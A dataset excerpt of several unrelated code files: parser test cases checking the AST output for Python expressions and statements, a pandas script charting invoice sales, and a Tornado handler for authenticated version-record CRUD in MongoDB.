check('''not x.a or not y.b or not z.c''', Suite((Call('return', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('or', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))))),)))
check('''(not x.a or not y.b, None) and not z.c''', Suite((Call('return', Call('and', Call('tuple', Call('or', Call('not', Call('.', Name('x'), 'a')), Call('not', Call('.', Name('y'), 'b'))), Const(None)), Call('not', Call('.', Name('z'), 'c')))),)))
check('''not x.a and (not y.b or not z.c, None)''', Suite((Call('return', Call('and', Call('not', Call('.', Name('x'), 'a')), Call('tuple', Call('or', Call('not', Call('.', Name('y'), 'b')), Call('not', Call('.', Name('z'), 'c'))), Const(None)))),)))
# --- Comparisons combined with and/or ----------------------------------------
# Every comparison operator once more, then comparisons joined by and/or,
# and long 'and' chains showing the right-nested AST shape.
check('''x != y''', Suite((Call('return', Call('!=', Name('x'), Name('y'))),)))
check('''x == y''', Suite((Call('return', Call('==', Name('x'), Name('y'))),)))
check('''x <= y''', Suite((Call('return', Call('<=', Name('x'), Name('y'))),)))
check('''x > y''', Suite((Call('return', Call('>', Name('x'), Name('y'))),)))
check('''x >= y''', Suite((Call('return', Call('>=', Name('x'), Name('y'))),)))
check('''x < y''', Suite((Call('return', Call('<', Name('x'), Name('y'))),)))
check('''x not in y''', Suite((Call('return', Call('not-in', Name('x'), Name('y'))),)))
check('''x in y''', Suite((Call('return', Call('in', Name('x'), Name('y'))),)))
check('''x == y and y == z''', Suite((Call('return', Call('and', Call('==', Name('x'), Name('y')), Call('==', Name('y'), Name('z')))),)))
check('''x == y and y == z''', Suite((Call('return', Call('and', Call('==', Name('x'), Name('y')), Call('==', Name('y'), Name('z')))),)))
check('''x == y or y == z''', Suite((Call('return', Call('or', Call('==', Name('x'), Name('y')), Call('==', Name('y'), Name('z')))),)))
check('''x != y or y != z''', Suite((Call('return', Call('or', Call('!=', Name('x'), Name('y')), Call('!=', Name('y'), Name('z')))),)))
check('''x != y or y != z''', Suite((Call('return', Call('or', Call('!=', Name('x'), Name('y')), Call('!=', Name('y'), Name('z')))),)))
check('''x != y or y == z''', Suite((Call('return', Call('or', Call('!=', Name('x'), Name('y')), Call('==', Name('y'), Name('z')))),)))
check('''a and b and c and d and e''', Suite((Call('return', Call('and', Name('a'), Call('and', Name('b'), Call('and', Name('c'), Call('and', Name('d'), Name('e')))))),)))
check('''a and b and c and d and e''', Suite((Call('return', Call('and', Name('a'), Call('and', Name('b'), Call('and', Name('c'), Call('and', Name('d'), Name('e')))))),)))
check("def g(x): return 3.14", Suite((Assign((Name('g'),), Def(('x',), (), Suite((Call('return', Const(3.14)),)))), Call('return', Const(None)),)))
check("""def g(x):
return 3.14""", Suite((Assign((Name('g'),), Def(('x',), (), Suite((Call('return', Const(3.14)),)))), Call('return', Const(None)),)))
check("def g(x, y): return x**2", Suite((Assign((Name('g'),), Def(('x', 'y'), (), Suite((Call('return', Call('**', Name('x'), Const(2))),)))), Call('return', Const(None)),)))
check("""def g(x, y):
return x**2""", Suite((Assign((Name('g'),), Def(('x', 'y'), (), Suite((Call('return', Call('**', Name('x'), Const(2))),)))), Call('return', Const(None)),)))
check("lambda: 3.14", Suite((Call('return', Def((), (), Suite((Call('return', Const(3.14)),)))),)))
check("lambda x: x**2", Suite((Call('return', Def(('x',), (), Suite((Call('return', Call('**', Name('x'), Const(2))),)))),)))
check("(lambda x: x**2, None)", Suite((Call('return', Call('tuple', Def(('x',), (), Suite((Call('return', Call('**', Name('x'), Const(2))),))), Const(None))),)))
check("1 if x == 0 else 2", Suite((Call('if', Call('==', Name('x'), Const(0)), Suite((Call('return', Const(1)),)), Suite((Call('return', Const(2)),))),)))
check("y = (1 if x == 0 else 2, None)", Suite((Assign((Name('y'),), Call('tuple', Call('?', Call('==', Name('x'), Const(0)), Const(1), Const(2)), Const(None))), Call('return', Const(None)),)))
check("1 if x == 0 else None", Suite((Call('if', Call('==', Name('x'), Const(0)), Suite((Call('return', Const(1)),)), Suite((Call('return', Const(None)),))),)))
check("(1 if x == 0 else 2, None)", Suite((Call('return', Call('tuple', Call('?', Call('==', Name('x'), Const(0)), Const(1), Const(2)), Const(None))),)))
check("(1 if x == 0 else None, None)", Suite((Call('return', Call('tuple', Call('?', Call('==', Name('x'), Const(0)), Const(1), Const(None)), Const(None))),)))
check("""if x == 0:
return 1""", Suite((Call('if', Call('==', Name('x'), Const(0)), Suite((Call('return', Const(1)),)), Suite((Call('return', Const(None)),))),)))
check("""if x == 0:
y = 1
return 1""", Suite((Call('if', Call('==', Name('x'), Const(0)), Suite((Assign((Name('y'),), Const(1)), Call('return', Const(1)),)), Suite((Call('return', Const(None)),))),)))
check('''if x == 0:
return 1
else:
return 2''', Suite((Call('if', Call('==', Name('x'), Const(0)), Suite((Call('return', Const(1)),)), Suite((Call('return', Const(2)),))),)))
check('''if x == 0:
y = 1
return 1
else:
y = 2
return 2''', Suite((Call('if', Call('==', Name('x'), Const(0)), Suite((Assign((Name('y'),), Const(1)), Call('return', Const(1)),)), Suite((Assign((Name('y'),), Const(2)), Call("return", Const(2))))),)))
check('''if x == 0:
return 1
elif x == 1:
return 2
else:
return 3''', Suite((Call('if', Call('==', Name('x'), Const(0)), Suite((Call('return', Const(1)),)), Suite((Call('if', Call('==', Name('x'), Const(1)), Suite((Call('return', Const(2)),)), Suite((Call('return', Const(3)),))),))),)))
check('''if x == 0:
y = 1
return 1
elif x == 1:
y = 2
return 2
else:
y = 3
return 3''', Suite((Call('if', Call('==', Name('x'), Const(0)), Suite((Assign((Name('y'),), Const(1)), Call('return', Const(1)),)), Suite((Call('if', Call('==', Name('x'), Const(1)), Suite((Assign((Name('y'),), Const(2)), Call('return', Const(2)),)), Suite((Assign((Name('y'),), Const(3)), Call("return", Const(3))))),))),)))
check('''if x == 0:
y = 1''', Suite((Call('if', Call('==', Name('x'), Const(0)), Suite((Assign((Name('y'),), Const(1)),))), Call('return', Const(None)),)))
check('''if x == 0:
y = 1
z = 1''', Suite((Call('if', Call('==', Name('x'), Const(0)), Suite((Assign((Name('y'),), Const(1)), Assign((Name('z'),), Const(1)),))), Call('return', Const(None)),)))
check('''if x == 0:
y = 1
else:
y = 2''', Suite((Call('if', Call('==', Name('x'), Const(0)), Suite((Assign((Name('y'),), Const(1)),)), Suite((Assign((Name('y'),), Const(2)),))), Call('return', Const(None)),)))
check('''if x == 0:
y = 1
z = 1
else:
y = 2
z = 2''', Suite((Call('if', Call('==', Name('x'), Const(0)), Suite((Assign((Name('y'),), Const(1)), Assign((Name('z'),), Const(1)),)), Suite((Assign((Name('y'),), Const(2)), Assign((Name('z'),), Const(2)),))), Call('return', Const(None)),)))
# check("print(None)", Suite((Call('return', Call(Name('print'), Const(None))),)))
# check("print(1, None)", Suite((Call('return', Call(Name('print'), Const(1), Const(None))),)))
# check("print(1, 2, 3, None)", Suite((Call('return', Call(Name('print'), Const(1), Const(2), Const(3), Const(None))),)))
check("[]", Suite((Call('return', Call('list')),)))
check("[1]", Suite((Call('return', Call('list', Const(1))),)))
check("[1, 2]", Suite((Call('return', Call('list', Const(1), Const(2))),)))
check("[one]", Suite((Call('return', Call('list', Name('one'))),)))
check("[one, two]", Suite((Call('return', Call('list', Name('one'), Name('two'))),)))
check("['one']", Suite((Call('return', Call('list', Const('one'))),)))
check("['one', 'two']", Suite((Call('return', Call('list', Const('one'), Const('two'))),)))
check("set([])", Suite((Call('return', Call(Name('set'), Call('list'))),)))
check("set([1])", Suite((Call('return', Call(Name('set'), Call('list', Const(1)))),)))
check("set([1, 2])", Suite((Call('return', Call(Name('set'), Call('list', Const(1), Const(2)))),)))
check("set([one])", Suite((Call('return', Call(Name('set'), Call('list', Name('one')))),)))
check("set([one, two])", Suite((Call('return', Call(Name('set'), Call('list', Name('one'), Name('two')))),)))
check("set(['one'])", Suite((Call('return', Call(Name('set'), Call('list', Const('one')))),)))
check("set(['one', 'two'])", Suite((Call('return', Call(Name('set'), Call('list', Const('one'), Const('two')))),)))
check("{}", Suite((Call('return', Call('dict')),)))
check("{1}", Suite((Call('return', Call('set', Const(1))),)))
check("{1, 2}", Suite((Call('return', Call('set', Const(1), Const(2))),)))
check("{one}", Suite((Call('return', Call('set', Name('one'))),)))
check("{one, two}", Suite((Call('return', Call('set', Name('one'), Name('two'))),)))
check("{'one'}", Suite((Call('return', Call('set', Const('one'))),)))
check("{'one', 'two'}", Suite((Call('return', Call('set', Const('one'), Const('two'))),)))
check("{'x': 1}", Suite((Call('return', Call('dict', Const('x'), Const(1))),)))
check("{'x': 1, 'y': 2}", Suite((Call('return', Call('dict', Const('x'), Const(1), Const('y'), Const(2))),)))
check("{'x': 1, 'y': 2, 'z': 3}", Suite((Call('return', Call('dict', Const('x'), Const(1), Const('y'), Const(2), Const('z'), Const(3))),)))
check("{'x': one}", Suite((Call('return', Call('dict', Const('x'), Name('one'))),)))
check("{'x': one, 'y': two}", Suite((Call('return', Call('dict', Const('x'), Name('one'), Const('y'), Name('two'))),)))
check("{'x': one, 'y': two, 'z': three}", Suite((Call('return', Call('dict', Const('x'), Name('one'), Const('y'), Name('two'), Const('z'), Name('three'))),)))
check("{1: 1}", Suite((Call('return', Call('dict', Const(1), Const(1))),)))
check("{1: 1, 2: 2}", Suite((Call('return', Call('dict', Const(1), Const(1), Const(2), Const(2))),)))
check("{1: 1, 2: 2, 3: 3}", Suite((Call('return', Call('dict', Const(1), Const(1), Const(2), Const(2), Const(3), Const(3))),)))
check("{1: one}", Suite((Call('return', Call('dict', Const(1), Name('one'))),)))
check("{1: one, 2: two}", Suite((Call('return', Call('dict', Const(1), Name('one'), Const(2), Name('two'))),)))
check("{1: one, 2: two, 3: three}", Suite((Call('return', Call('dict', Const(1), Name('one'), Const(2), Name('two'), Const(3), Name('three'))),)))
check("{one: 1}", Suite((Call('return', Call('dict', Name('one'), Const(1))),)))
check("{one: 1, two: 2}", Suite((Call('return', Call('dict', Name('one'), Const(1), Name('two'), Const(2))),)))
check("{one: 1, two: 2, three: 3}", Suite((Call('return', Call('dict', Name('one'), Const(1), Name('two'), Const(2), Name('three'), Const(3))),)))
check("{one: one}", Suite((Call('return', Call('dict', Name('one'), Name('one'))),)))
check("{one: one, two: two}", Suite((Call('return', Call('dict', Name('one'), Name('one'), Name('two'), Name('two'))),)))
check("{one: one, two: two, three: three}", Suite((Call('return', Call('dict', Name('one'), Name('one'), Name('two'), Name('two'), Name('three'), Name('three'))),)))
check("[x**2 for x in something]", Suite((Call('return', Call(Call('.', Name('something'), 'map'), Def(('x',), (), Suite((Call('return', Call('**', Name('x'), Const(2))),))))),)))
check("[x**2 for x in something if x > 0]", Suite((Call('return', Call(Call('.', Call(Call('.', Name('something'), 'filter'), Def(('x',), (), Suite((Call('return', Call('>', Name('x'), Const(0))),)))), 'map'), Def(('x',), (), Suite((Call('return', Call('**', Name('x'), Const(2))),))))),)))
check("[y**2 for x in something for y in x]", Suite((Call('return', Call(Call('.', Name('something'), 'map'), Def(('x',), (), Suite((Call('return', Call(Call('.', Name('x'), 'map'), Def(('y',), (), Suite((Call('return', Call('**', Name('y'), Const(2))),))))),))))),)))
check("[y**2 for x in something for y in x if x > 0]", Suite((Call('return', Call(Call('.', Name('something'), 'map'), Def(('x',), (), Suite((Call('return', Call(Call('.', Call(Call('.', Name('x'), 'filter'), Def(('y',), (), Suite((Call('return', Call('>', Name('x'), Const(0))),)))), 'map'), Def(('y',), (), Suite((Call('return', Call('**', Name('y'), Const(2))),))))),))))),)))
check("[y**2 for x in something for y in x if y > 0]", Suite((Call('return', Call(Call('.', Name('something'), 'map'), Def(('x',), (), Suite((Call('return', Call(Call('.', Call(Call('.', Name('x'), 'filter'), Def(('y',), (), Suite((Call('return', Call('>', Name('y'), Const(0))),)))), 'map'), Def(('y',), (), Suite((Call('return', Call('**', Name('y'), Const(2))),))))),))))),)))
check("[y**2 for x in something if x for y in x if x > 0]", Suite((Call('return', Call(Call('.', Call(Call('.', Name('something'), 'filter'), Def(('x',), (), Suite((Call('return', Name('x')),)))), 'map'), Def(('x',), (), Suite((Call('return', Call(Call('.', Call(Call('.', Name('x'), 'filter'), Def(('y',), (), Suite((Call('return', Call('>', Name('x'), Const(0))),)))), 'map'), Def(('y',), (), Suite((Call('return', Call('**', Name('y'), Const(2))),))))),))))),)))
check("f([x**2 for x in something], None)", Suite((Call('return', Call(Name('f'), Call(Call('.', Name('something'), 'map'), Def(('x',), (), Suite((Call('return', Call('**', Name('x'), Const(2))),)))), Const(None))),)))
check("f([x**2 for x in something if x > 0], None)", Suite((Call('return', Call(Name('f'), Call(Call('.', Call(Call('.', Name('something'), 'filter'), Def(('x',), (), Suite((Call('return', Call('>', Name('x'), Const(0))),)))), 'map'), Def(('x',), (), Suite((Call('return', Call('**', Name('x'), Const(2))),)))), Const(None))),)))
check("f([y**2 for x in something for y in x], None)", Suite((Call('return', Call(Name('f'), Call(Call('.', Name('something'), 'map'), Def(('x',), (), Suite((Call('return', Call(Call('.', Name('x'), 'map'), Def(('y',), (), Suite((Call('return', Call('**', Name('y'), Const(2))),))))),)))), Const(None))),)))
check("f([y**2 for x in something for y in x if x > 0], None)", Suite((Call('return', Call(Name('f'), Call(Call('.', Name('something'), 'map'), Def(('x',), (), Suite((Call('return', Call(Call('.', Call(Call('.', Name('x'), 'filter'), Def(('y',), (), Suite((Call('return', Call('>', Name('x'), Const(0))),)))), 'map'), Def(('y',), (), Suite((Call('return', Call('**', Name('y'), Const(2))),))))),)))), Const(None))),)))
check("f([y**2 for x in something for y in x if y > 0], None)", Suite((Call('return', Call(Name('f'), Call(Call('.', Name('something'), 'map'), Def(('x',), (), Suite((Call('return', Call(Call('.', Call(Call('.', Name('x'), 'filter'), Def(('y',), (), Suite((Call('return', Call('>', Name('y'), Const(0))),)))), 'map'), Def(('y',), (), Suite((Call('return', Call('**', Name('y'), Const(2))),))))),)))), Const(None))),)))
check("f([y**2 for x in something if x for y in x if x > 0], None)", Suite((Call('return', Call(Name('f'), Call(Call('.', Call(Call('.', Name('something'), 'filter'), Def(('x',), (), Suite((Call('return', Name('x')),)))), 'map'), Def(('x',), (), Suite((Call('return', Call(Call('.', Call(Call('.', Name('x'), 'filter'), Def(('y',), (), Suite((Call('return', Call('>', Name('x'), Const(0))),)))), 'map'), Def(('y',), (), Suite((Call('return', Call('**', Name('y'), Const(2))),))))),)))), Const(None))),)))
check("f((x**2 for x in something), None)", Suite((Call('return', Call(Name('f'), Call(Call('.', Name('something'), 'map'), Def(('x',), (), Suite((Call('return', Call('**', Name('x'), Const(2))),)))), Const(None))),)))
check("f((x**2 for x in something if x > 0), None)", Suite((Call('return', Call(Name('f'), Call(Call('.', Call(Call('.', Name('something'), 'filter'), Def(('x',), (), Suite((Call('return', Call('>', Name('x'), Const(0))),)))), 'map'), Def(('x',), (), Suite((Call('return', Call('**', Name('x'), Const(2))),)))), Const(None))),)))
check("f((y**2 for x in something for y in x), None)", Suite((Call('return', Call(Name('f'), Call(Call('.', Name('something'), 'map'), Def(('x',), (), Suite((Call('return', Call(Call('.', Name('x'), 'map'), Def(('y',), (), Suite((Call('return', Call('**', Name('y'), Const(2))),))))),)))), Const(None))),)))
check("f((y**2 for x in something for y in x if x > 0), None)", Suite((Call('return', Call(Name('f'), Call(Call('.', Name('something'), 'map'), Def(('x',), (), Suite((Call('return', Call(Call('.', Call(Call('.', Name('x'), 'filter'), Def(('y',), (), Suite((Call('return', Call('>', Name('x'), Const(0))),)))), 'map'), Def(('y',), (), Suite((Call('return', Call('**', Name('y'), Const(2))),))))),)))), Const(None))),)))
check("f((y**2 for x in something for y in x if y > 0), None)", Suite((Call('return', Call(Name('f'), Call(Call('.', Name('something'), 'map'), Def(('x',), (), Suite((Call('return', Call(Call('.', Call(Call('.', Name('x'), 'filter'), Def(('y',), (), Suite((Call('return', Call('>', Name('y'), Const(0))),)))), 'map'), Def(('y',), (), Suite((Call('return', Call('**', Name('y'), Const(2))),))))),)))), Const(None))),)))
check("f((y**2 for x in something if x for y in x if x > 0), None)", Suite((Call('return', Call(Name('f'), Call(Call('.', Call(Call('.', Name('something'), 'filter'), Def(('x',), (), Suite((Call('return', Name('x')),)))), 'map'), Def(('x',), (), Suite((Call('return', Call(Call('.', Call(Call('.', Name('x'), 'filter'), Def(('y',), (), Suite((Call('return', Call('>', Name('x'), Const(0))),)))), 'map'), Def(('y',), (), Suite((Call('return', Call('**', Name('y'), Const(2))),))))),)))), Const(None))),)))
check("f(one=1)", Suite((Call('return', CallKeyword(Name('f'), (), (('one', Const(1)),))),)))
check("f(one=1, two=2)", Suite((Call('return', CallKeyword(Name('f'), (), (('one', Const(1)), ('two', Const(2))))),)))
check("f(x, one=1)", Suite((Call('return', CallKeyword(Name('f'), (Name('x'),), (('one', Const(1)),))),)))
check("f(x, one=1, two=2)", Suite((Call('return', CallKeyword(Name('f'), (Name('x'),), (('one', Const(1)), ('two', Const(2))))),)))
check("x[..., :]", Suite((Call('return', Call('[.]', Name('x'), Const(Ellipsis), Call('slice', Const(None), Const(None), Const(None)))),)))
check('x = y = 1', Suite((Assign((Name('x'), Name('y')), Const(1)), Call('return', Const(None)),)))
check('x = y = z = 1', Suite((Assign((Name('x'), Name('y'), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x, y = 1', Suite((Assign((Unpack((Name('x'), Name('y'))),), Const(1)), Call('return', Const(None)),)))
check('x, y = z = 1', Suite((Assign((Unpack((Name('x'), Name('y'))), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x = y, z = 1', Suite((Assign((Name('x'), Unpack((Name('y'), Name('z')))), Const(1)), Call('return', Const(None)),)))
check('x.a = y = 1', Suite((Assign((Call('.', Name('x'), 'a'), Name('y'),), Const(1)), Call('return', Const(None)),)))
check('x.a = y = z = 1', Suite((Assign((Call('.', Name('x'), 'a'), Name('y'), Name('z'),), Const(1)), Call('return', Const(None)),)))
check('x.a, y = 1', Suite((Assign((Unpack((Call('.', Name('x'), 'a'), Name('y'))),), Const(1)), Call('return', Const(None)),)))
check('x.a, y = z = 1', Suite((Assign((Unpack((Call('.', Name('x'), 'a'), Name('y'))), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x.a = y, z = 1', Suite((Assign((Call('.', Name('x'), 'a'), Unpack((Name('y'), Name('z')))), Const(1)), Call('return', Const(None)),)))
check('x = y.a = 1', Suite((Assign((Name('x'), Call('.', Name('y'), 'a'),), Const(1)), Call('return', Const(None)),)))
check('x = y.a = z = 1', Suite((Assign((Name('x'), Call('.', Name('y'), 'a'), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x, y.a = 1', Suite((Assign((Unpack((Name('x'), Call('.', Name('y'), 'a'))),), Const(1)), Call('return', Const(None)),)))
check('x, y.a = z = 1', Suite((Assign((Unpack((Name('x'), Call('.', Name('y'), 'a'))), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x = y.a, z = 1', Suite((Assign((Name('x'), Unpack((Call('.', Name('y'), 'a'), Name('z')))), Const(1)), Call('return', Const(None)),)))
check('x = y = z.a = 1', Suite((Assign((Name('x'), Name('y'), Call('.', Name('z'), 'a'),), Const(1)), Call('return', Const(None)),)))
check('x, y = z.a = 1', Suite((Assign((Unpack((Name('x'), Name('y'))), Call('.', Name('z'), 'a'),), Const(1)), Call('return', Const(None)),)))
check('x = y, z.a = 1', Suite((Assign((Name('x'), Unpack((Name('y'), Call('.', Name('z'), 'a'))),), Const(1)), Call('return', Const(None)),)))
check('x[0] = y = 1', Suite((Assign((Call('[.]', Name('x'), Const(0)), Name('y'),), Const(1)), Call('return', Const(None)),)))
check('x[0] = y = z = 1', Suite((Assign((Call('[.]', Name('x'), Const(0)), Name('y'), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x[0], y = 1', Suite((Assign((Unpack((Call('[.]', Name('x'), Const(0)), Name('y'),)),), Const(1)), Call('return', Const(None)),)))
check('x[0], y = z = 1', Suite((Assign((Unpack((Call('[.]', Name('x'), Const(0)), Name('y'))), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x[0] = y, z = 1', Suite((Assign((Call('[.]', Name('x'), Const(0)), Unpack((Name('y'), Name('z')))), Const(1)), Call('return', Const(None)),)))
check('x = y[0] = 1', Suite((Assign((Name('x'), Call('[.]', Name('y'), Const(0)),), Const(1)), Call('return', Const(None)),)))
check('x = y[0] = z = 1', Suite((Assign((Name('x'), Call('[.]', Name('y'), Const(0)), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x, y[0] = 1', Suite((Assign((Unpack((Name('x'), Call('[.]', Name('y'), Const(0)))),), Const(1)), Call('return', Const(None)),)))
check('x, y[0] = z = 1', Suite((Assign((Unpack((Name('x'), Call('[.]', Name('y'), Const(0)))), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x = y[0], z = 1', Suite((Assign((Name('x'), Unpack((Call('[.]', Name('y'), Const(0)), Name('z')))), Const(1)), Call('return', Const(None)),)))
check('x = y = z[0] = 1', Suite((Assign((Name('x'), Name('y'), Call('[.]', Name('z'), Const(0)),), Const(1)), Call('return', Const(None)),)))
check('x, y = z[0] = 1', Suite((Assign((Unpack((Name('x'), Name('y'))), Call('[.]', Name('z'), Const(0)),), Const(1)), Call('return', Const(None)),)))
check('x = y, z[0] = 1', Suite((Assign((Name('x'), Unpack((Name('y'), Call('[.]', Name('z'), Const(0)))),), Const(1)), Call('return', Const(None)),)))
check('x[:, ...] = y = 1', Suite((Assign((Call('[.]', Name('x'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)), Name('y'),), Const(1)), Call('return', Const(None)),)))
check('x[:, ...] = y = z = 1', Suite((Assign((Call('[.]', Name('x'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)), Name('y'), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x[:, ...], y = 1', Suite((Assign((Unpack((Call('[.]', Name('x'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)), Name('y'))),), Const(1)), Call('return', Const(None)),)))
check('x[:, ...], y = z = 1', Suite((Assign((Unpack((Call('[.]', Name('x'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)), Name('y'))), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x[:, ...] = y, z = 1', Suite((Assign((Call('[.]', Name('x'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)), Unpack((Name('y'), Name('z')))), Const(1)), Call('return', Const(None)),)))
check('x = y[:, ...] = 1', Suite((Assign((Name('x'), Call('[.]', Name('y'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)),), Const(1)), Call('return', Const(None)),)))
check('x = y[:, ...] = z = 1', Suite((Assign((Name('x'), Call('[.]', Name('y'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x, y[:, ...] = 1', Suite((Assign((Unpack((Name('x'), Call('[.]', Name('y'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)))),), Const(1)), Call('return', Const(None)),)))
check('x, y[:, ...] = z = 1', Suite((Assign((Unpack((Name('x'), Call('[.]', Name('y'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)))), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x = y[:, ...], z = 1', Suite((Assign((Name('x'), Unpack((Call('[.]', Name('y'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)), Name('z')))), Const(1)), Call('return', Const(None)),)))
check('x = y = z[:, ...] = 1', Suite((Assign((Name('x'), Name('y'), Call('[.]', Name('z'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)),), Const(1)), Call('return', Const(None)),)))
check('x, y = z[:, ...] = 1', Suite((Assign((Unpack((Name('x'), Name('y'))), Call('[.]', Name('z'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)),), Const(1)), Call('return', Const(None)),)))
check('x = y, z[:, ...] = 1', Suite((Assign((Name('x'), Unpack((Name('y'), Call('[.]', Name('z'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)))),), Const(1)), Call('return', Const(None)),)))
|
13,168 | 66510609ef28eb6141f244ef018ee35b3b1f5709 | from .data import preprocess_dataset
|
13,169 | 58499617f385bd3aa532d655fe99293ee40e65a7 | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
# Invoice sales analysis: load the invoice CSV, derive a month-year label,
# and plot total sales per month, currency usage, and totals per supplier
# and supplier location.
data = pd.read_csv("Invoice.csv")
data.head()
data.info()
data.describe()
df = pd.DataFrame(data)

# Drop the duplicate amount column and any stray "Unnamed" index columns
# left over from the CSV export.
df.drop(['Amount 1'], axis=1, inplace=True)
df = df.iloc[:, ~df.columns.str.contains('Unnamed')]
df.info()

# Derive year and month from the accounting date and join them into a
# "month-year" label used as the grouping key below.
df['year'] = pd.DatetimeIndex(df['AccountingDate']).year
df['month'] = pd.DatetimeIndex(df['AccountingDate']).month
df.info()
df['AccountingDate'].min()
df["month"] = df["month"].astype(str)
df["year"] = df["year"].astype(str)
df["month_year"] = df[["month", "year"]].agg('-'.join, axis=1)
df.isnull().sum()
print(df.columns.tolist())

# NOTE: the column name really is "Amount " (trailing space) in the CSV.
df["Amount "] = df["Amount "].astype(int)

# BUG FIX: select the numeric column *before* summing. The original
# `df.groupby(...).sum()["Amount "]` summed every column, including the
# string ones — deprecated for years and a TypeError in pandas >= 2.0.
df_sales = df.groupby("month_year")["Amount "].sum().reset_index()
plt.figure(figsize=(15, 6))
sns.barplot(x="month_year", y="Amount ", data=df_sales)
plt.xlabel("Date")
plt.ylabel("Amount")
plt.title("analysis of sales")
plt.show()

# Which currencies appear most often across invoices.
plt.figure(figsize=(15, 6))
sns.countplot(x="AmountCurrency", data=df)
plt.xlabel("AmountCurrency")
plt.ylabel("higest currency used")
plt.title("currency analysis")
plt.show()

# Total sales per supplier.
df_supplier = df.groupby("SupplierId")["Amount "].sum().reset_index()
plt.figure(figsize=(120, 20))
sns.barplot(x="SupplierId", y="Amount ", data=df_supplier)
plt.xlabel("Supplier")
plt.ylabel("Amount")
plt.title("analysis of supplier sales")
plt.xticks(rotation='vertical', size=10)
plt.ylim(1000, 100000)
plt.show()

# Total sales per supplier location.
df_location = df.groupby("SupplierLocationId")["Amount "].sum().reset_index()
plt.figure(figsize=(40, 10))
sns.barplot(x="SupplierLocationId", y="Amount ", data=df_location)
plt.xlabel("SupplierLocationId")
plt.ylabel("Amount")
plt.title("analysis of supplierlocation sales")
plt.xticks(rotation='vertical', size=10)
plt.show()
13,170 | 9fff54fe3ce0c9a30ae1d36992c85be6a1cc61f9 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2015-06-09 20:53:40
# @Author : Your Name (you@example.org)
# @Link : http://example.org
# @Version : $Id$
import tornado.web
from tornado.web import asynchronous
from tornado.options import options
import json
from bson import ObjectId
from log import get_logger
import optionsSetting
from handler_baseHt import BaseHtHandler
from mongo_field_encoder import MongoFieldEncoder
from mongolog import MongoHandler
from mongokit.helpers import totimestamp, fromtimestamp
from auth import requires_auth
from tornado.httpclient import HTTPRequest
from utils.mongo_front import MongoFront
import datetime
try:
from tornado.curl_httpclient import CurlAsyncHTTPClient as AsyncHTTPClient
except ImportError:
from tornado.simple_httpclient import SimpleAsyncHTTPClient as AsyncHTTPClient
from model.version import Versions
log = get_logger()
class VersionsHandler(BaseHtHandler):
    """Version management handler: CRUD over the Versions Mongo collection."""

    def __init__(self, application, request, **kwargs):
        super(VersionsHandler, self).__init__(application, request, **kwargs)

    @asynchronous
    @requires_auth
    def get(self):
        """List all versions (newest first), or one version when version_id is given."""
        log.info('VersionHandler.get')
        where = {}
        version_id = self.get_argument("version_id", None)
        # Use identity comparison with None instead of `!= None`.
        if version_id is not None:
            where = {"_id": ObjectId(version_id)}
        sort = [("created", -1)]
        version = options.dbconn.Versions.find(where).sort(sort)
        response = {}
        response["entities"] = list(version) or []
        response["count"] = str(version.count())
        self.write(json.dumps(response, indent=2, ensure_ascii=False, cls=MongoFieldEncoder))
        self.finish()

    @asynchronous
    @requires_auth
    def post(self):
        """Create a new version record from the JSON request body."""
        log.info('VersionHandler.post')
        request = self.request.body
        created = datetime.datetime.utcnow()
        version = options.dbconn.Versions.from_json(request)
        version['created'] = created
        version.save()
        self.write(json.dumps({}, indent=2, ensure_ascii=False, cls=MongoFieldEncoder))
        self.finish()

    @asynchronous
    @requires_auth
    def put(self):
        """Update a version; a 'tiptop' flag is first cleared from any other
        version of the same OS so at most one version per OS is tiptop."""
        # BUG FIX: the log prefix said "ActivityHandler" — a copy/paste
        # leftover from another handler that made these logs misleading.
        log.info("VersionsHandler.put:" + self.request.body)
        # NOTE(review): json.loads(..., encoding=...) was removed in
        # Python 3.9 — drop the kwarg if this ever runs on modern Python.
        body_dic = json.loads(self.request.body, encoding="utf-8")
        version_id = body_dic.get("version_id", None)
        if version_id is None:
            self.fire_response_bad_request()
            return
        del body_dic["version_id"]
        if "tiptop" in body_dic:
            os = body_dic.get("os", "")
            lookup = {"tiptop": True, "os": os}
            update = {"$unset": {"tiptop": ""}}
            options.dbconn.Versions.find_and_modify(lookup, update, new=True)
        lookup = {"_id": ObjectId(version_id)}
        body_dic["modified"] = datetime.datetime.utcnow()
        option = {'$set': body_dic}
        version = options.dbconn.Versions.find_and_modify(lookup, option, new=True)
        self.finish()

    @asynchronous
    @requires_auth
    def delete(self):
        """Delete the version identified by the version_id query argument."""
        # BUG FIX: log prefix corrected from "ActivityHandler" (see put()).
        log.info("VersionsHandler.delete:" + self.request.body)
        version_id = self.get_argument("version_id", None)
        if version_id is None:
            self.fire_response_bad_request()
            return
        lookup = {"_id": ObjectId(version_id)}
        version = MongoFront.remove(lookup, "versions")
        self.finish()
|
